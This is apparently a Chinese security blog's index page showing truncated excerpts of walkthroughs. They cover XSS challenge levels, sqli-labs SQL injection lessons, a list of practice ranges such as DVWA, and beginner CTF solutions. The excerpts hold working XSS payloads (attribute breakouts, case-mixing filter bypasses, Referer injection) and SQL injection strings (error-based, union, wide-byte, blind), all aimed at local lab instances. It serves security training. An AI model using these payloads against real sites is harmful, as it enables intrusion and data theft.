3hex的博客

11. Level11-Referer注入打开关卡11，发现有一个隐藏域t_ref的值来源于Referer。我们从Referer点注入事件。Referer必须包含字符串http://，否则不会显示。使用BurpSuite抓包，修改Refere。我们使用"闭合value，type清空隐藏属性，注入onclick事件。Referer:"http:/// type="" onclick="alert(1)使用BuprSuite抓包修改，不添加http://也可以触发。点...

由于有FlashXSS，需要配置一下环境，下载Flash和JPEXS（Flash反编译工具）。14. Level14-图片EXIF注入这关卡的iframe引用的地址打不开，我们自己写一个简单的放在本地服务器上，引用对应的URL就行，同时需要打开php_exif开关。index.php放在根目录，URL为http://127.0.0.1<?php echo ' <html> <head> <meta http-equiv=.

6. Level6-大小写绕过GET请求方式，数据回显在input标签的value中。我们尝试注入事件。on被过滤为o_n。我们尝试大小写绕过。http://127.0.0.1:8005/level6.php?keyword="+oNclick="alert(1)点击成功触发XSS。代码：只过滤<script、on、src、data、href，没有过滤大小写，例如：<ScRipT、oN。同理使用注入脚本（script改为sCript）也可也.

1. Level1-标签中无过滤提交正常数据，字符串xss，判断请求方式为GET请求，字符回显在h2标签内。我们测试直接插入脚本<script>标签。http://127.0.0.1:8005/level1.php?name=<script>alert(1);</script>代码成功注入HTML页面中。代码:2. Level2-属性值(双引号闭合)无过滤提交正常数据，依然时GET请求方式，数据回显在input的valu...

提供主要的语句，略去探测数据库名，表名，字段名的步骤。1.Less1请求方式 注入方式 类型 备注 Get 基于报错注入(updatexml函数) 字符型 单引号闭合 1. 正常提交http://127.0.0.1:8003/Less-1/?id=12. 语句报错http://127.0.0.1:8003/Less-1/?id=1'3. 执行注入的SQLhttp://127.0.0.1:8003/Less-1/?id=1...

提供主要的语句，略去探测数据库名，表名，字段名的步骤。31.Less28请求方式 注入方式 类型 备注 GET 基于报错注入(Union内联注入) 字符型 过滤关键词select、union以及组合，单引号、括号闭合 1. 正常提交http://127.0.0.1:8003/Less-28/?id=12. 语句报错http://127.0.0.1:8003/Less-28/?id=1 1'2"3http://127.0.0.1:8003.

提供主要的语句，略去探测数据库名，表名，字段名的步骤。11.Less11请求方式 注入方式 类型 备注 POST 基于报错注入(Union内联注入) 字符型 单引号闭合 1. 正常提交uname=1&passwd=22. 语句报错uname=1'&passwd=2uname=1'3&passwd=2uname=1'3"&passwd=23. 执行注入的SQLuname=1' or 1 %23&.

提供主要的语句，略去探测数据库名，表名，字段名的步骤。50.Less46请求方式 注入方式 类型 备注 GET 报错注入 整型 注入点在order by处 1. 正常提交http://127.0.0.1:8003/Less-46/?sort=12. 语句报错http://127.0.0.1:8003/Less-46/?sort=1 1'2"3http://127.0.0.1:8003/Less-46/?sort=1 1'http://.

从Less54之后为Challenges，在n次之内从challenges数据库中取出相应的数据。58.Less54请求方式 注入方式 备注 GET Union内联注入 10次语句以内完成 http://127.0.0.1:8003/Less-54/?id=1http://127.0.0.1:8003/Less-54/?id=1' and 0 --+http://127.0.0.1:8003/Less-54/?id=1' order by 1 --+htt

提供主要的语句，略去探测数据库名，表名，字段名的步骤。21.Less21请求方式 注入方式 类型 备注 POST 基于报错注入(updatexml函数) 字符型 Base64编码，Cookie注入点，单引号、括号闭合 已经提前取得一个用户信息，用户名dumb，密码2。并且之后的操作都是用BurpSuite的重发器测试。1. 正常提交首先正常登陆上去。可以发现Cookie进行了Base64编码，我们后续操作都需要对语句进行Base64编.

提供主要的语句，略去探测数据库名，表名，字段名的步骤。41.Less37请求方式 注入方式 类型 备注 POST Union注入，宽字节绕过 字符型 过滤特殊字符 1. 正常提交uname=1&passwd=12. 语句报错uname=1 1'2"3 &passwd=1uname=1 1%a0'2"3 &passwd=1uname=1 %a0' # &passwd=23. 执行注入的SQLun.

66.Less62请求方式 注入方式 备注 GET 盲注 130次语句以内完成 http://127.0.0.1:8003/Less-62/?id=1http://127.0.0.1:8003/Less-62/?id=-1') or 1 --+http://127.0.0.1:8003/Less-62/?id=-1') or (select 1)<0 --+67.Less63请求方式 注入方式 备注 GET 盲注

部分靶场是线上，部分是需要搭建本地环境。1. 综合性靶场DVWA - Damn Vulnerable Web ApplicationDamn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a le.

001.view source思路：无法在网页右击，可以判断是js禁止了我们右击。解题：1.我们禁用js后，刷新页面，右击->查看网页源代码，即可得到flag。2.使用抓取网络请求的Respond，在返回的数据中即可看到源码和flag。Flag: cyberpeace{38acf4e3641244fc86b1d53ea445e4c7}002. robots思路：根据题目提示，我们访问robots.txt文件解题：访问robots.txt文件，...

声明：由于笔者能力有限，难免出现各种错误和漏洞。全文仅作为个人笔记，仅供参考。环境：训练网站：https://www.bihuoedu.com/ctf/ctf01/工具：FireFox，Kail Linux一、流程：1. 第一关思路：打开F12-网络，当我们输入密码，并未发出任何网络请求，可以判断密码验证在前端完成。解题：网页页面右击->查看网页源代码，进行代码审计，得到密码为[go ]。2.第二关思路：根据提示，需要对图片进行分...